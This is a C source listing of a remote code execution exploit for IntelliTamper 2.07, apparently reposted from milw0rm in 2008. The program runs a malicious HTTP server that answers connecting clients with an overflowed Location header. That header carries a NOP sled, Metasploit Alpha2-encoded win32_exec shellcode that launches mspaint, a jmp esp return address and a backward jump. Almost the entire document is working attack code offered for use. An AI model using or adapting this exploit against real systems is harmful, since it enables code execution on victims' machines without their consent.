IntelliTamper 2.07 HTTP Header Remote Code Execution Exploit

							                         IntelliTamper 2.07 HTTP Header Remote Code Execution Exploit                       Page 1/3
   1   /**
   2    **
   3    ** IntelliTamper 2.07 Location: HTTP Header Remote Code Execution exploit.
   4    **
   5    ** Based on exploit by Koshi (written in Perl). This one should be more
   6    ** stable. Just for fun and to learn more about win32 exploitation.
   7    **
   8    ** by Wojciech Pawlikowski (wojtekp@gmail.com)
   9    **/
  10
  11   #include <sys/types.h>
  12   #include <sys/socket.h>
  13
  14   #include <arpa/inet.h>
  15   #include <netinet/in.h>
  16
  17   #include   <netdb.h>
  18   #include   <stdio.h>
  19   #include   <stdlib.h>
  20   #include   <string.h>
  21   #include   <unistd.h>
  22
  23   #define BUFSIZE                                                1550
  24   #define NOP                                                    0x90
  25   #define RETADDR                                                0x7c941EED   // jmp esp ntdll.dll
  26
  27   /* win32_exec −       EXITFUNC=thread CMD=mspaint Size=336 Encoder=Alpha2 http://metasploit.com */
  28
  29   unsigned char shellcode[] =
  30      "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49"
  31      "\x49\x48\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x6a\x42"
  32      "\x58\x30\x42\x31\x50\x41\x42\x6b\x41\x41\x52\x41\x32\x41\x41\x32"
  33      "\x42\x41\x30\x42\x41\x58\x50\x38\x41\x42\x75\x6d\x39\x59\x6c\x69"
  34      "\x78\x41\x54\x75\x50\x77\x70\x45\x50\x6c\x4b\x73\x75\x55\x6c\x4e"
  35      "\x6b\x61\x6c\x33\x35\x54\x38\x55\x51\x7a\x4f\x4c\x4b\x70\x4f\x45"
  36      "\x48\x4c\x4b\x33\x6f\x67\x50\x45\x51\x4a\x4b\x43\x79\x6c\x4b\x34"
  37      "\x74\x4c\x4b\x47\x71\x6a\x4e\x64\x71\x6f\x30\x5a\x39\x6e\x4c\x4e"
  38      "\x64\x4f\x30\x30\x74\x45\x57\x79\x51\x6b\x7a\x74\x4d\x37\x71\x5a"
  39      "\x62\x4a\x4b\x5a\x54\x55\x6b\x31\x44\x71\x34\x55\x54\x71\x65\x4b"
  40      "\x55\x6c\x4b\x73\x6f\x61\x34\x45\x51\x78\x6b\x65\x36\x6c\x4b\x36"
  41      "\x6c\x50\x4b\x4e\x6b\x71\x4f\x57\x6c\x35\x51\x38\x6b\x4c\x4b\x77"
  42      "\x6c\x6e\x6b\x77\x71\x6a\x4b\x4c\x49\x71\x4c\x37\x54\x34\x44\x7a"
  43      "\x63\x54\x71\x39\x50\x61\x74\x6c\x4b\x43\x70\x46\x50\x4b\x35\x49"
  44      "\x50\x72\x58\x46\x6c\x6c\x4b\x47\x30\x36\x6c\x6c\x4b\x70\x70\x37"
  45      "\x6c\x4e\x4d\x4c\x4b\x65\x38\x46\x68\x7a\x4b\x64\x49\x4e\x6b\x4f"
  46      "\x70\x6e\x50\x77\x70\x77\x70\x45\x50\x6c\x4b\x70\x68\x37\x4c\x63"
  47      "\x6f\x64\x71\x49\x66\x73\x50\x31\x46\x6e\x69\x59\x68\x4b\x33\x69"
  48      "\x50\x51\x6b\x30\x50\x32\x48\x5a\x4f\x5a\x6e\x69\x70\x45\x30\x33"
  49      "\x58\x4c\x58\x6b\x4e\x4c\x4a\x76\x6e\x66\x37\x6b\x4f\x7a\x47\x30"
  50      "\x6d\x53\x43\x62\x50\x53\x51\x73\x59\x32\x4e\x33\x44\x45\x50\x42";
  51
  52   int
Wojciech Pawlikowski                                                                                        08/10/2008
                         IntelliTamper 2.07 HTTP Header Remote Code Execution Exploit                     Page 2/3
  53    main(void)
  54    {
  55      struct sockaddr_in serv_sin, cli_sin;
  56      int i, sockfd, cli_sock, sock_opt = 1, sin_len;
  57      char *overflow, buf[BUFSIZE] = { 0 }, req[BUFSIZE + 100] = { 0 };
  58
  59      sockfd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
  60      if (sockfd < 0)
  61      {
  62        perror("socket()");
  63        exit(−1);
  64      }
  65
  66      serv_sin.sin_family = AF_INET;
  67      serv_sin.sin_port = htons(80);
  68      serv_sin.sin_addr.s_addr = INADDR_ANY;
  69
  70      if (setsockopt(sockfd, SOL_SOCKET, SO_REUSEADDR, &sock_opt, sizeof(int)) < 0)
  71      {
  72        perror("setsockopt()");
  73        close(sockfd);
  74        exit(−1);
  75      }
  76
  77     if (bind(sockfd, (struct sockaddr *)&serv_sin, sizeof(struct sockaddr)) < 0)
  78     {
  79       perror("bind()");
  80       close(sockfd);
  81       exit(−1);
  82     }
  83
  84     listen(sockfd, 1);
  85     sin_len = sizeof(struct sockaddr);
  86
  87     printf("[*] Waiting for a connection...\n");
  88
  89     while (1)
  90     {
  91       cli_sock = accept(sockfd, (struct sockaddr *)&cli_sin, &sin_len);
  92       if (cli_sock < 0)
  93       {
  94         perror("accept()");
  95         exit(−1);
  96       }
  97
  98       printf("[+] Connection from %s:%d\n", inet_ntoa(cli_sin.sin_addr), ntohs(cli_sin.sin_port));
  99
  100      read(cli_sock, buf, sizeof(buf) − 1);
  101      overflow = (char *)malloc(BUFSIZE + 1);
  102
  103      for (i = 0; i <= 1540; i += 4)
  104        *(long *)&overflow[i] = RETADDR;
Wojciech Pawlikowski                                                                                      08/10/2008
                            IntelliTamper 2.07 HTTP Header Remote Code Execution Exploit                                  Page 3/3
  105
  106           for (i = 0; i < 1536; i++)
  107             overflow[i] = NOP;
  108
  109           memcpy(overflow + 550, shellcode, strlen(shellcode));
  110           memcpy(overflow + i + 4, "\xe9\x14\xfc\xff\xff", 5);                           // jmp −1000 − jump to our buffer
  111
  112           i = sprintf(req, "200 HTTP/1.1\r\nDate: 2008−07−24 20:14:31\r\nLocation: ");
  113           memcpy(req + i, overflow, strlen(overflow));
  114           memcpy(req + i + strlen(overflow), "\r\n\r\n", 4);
  115
  116           write(cli_sock, req, strlen(req));
  117
  118           printf("[+] Exploit sent!\n");
  119
  120           close(cli_sock);
  121       }
  122
  123       close(sockfd);
  124   }
  125
  126   // milw0rm.com [2008−08−10]




Wojciech Pawlikowski                                                                                                       08/10/2008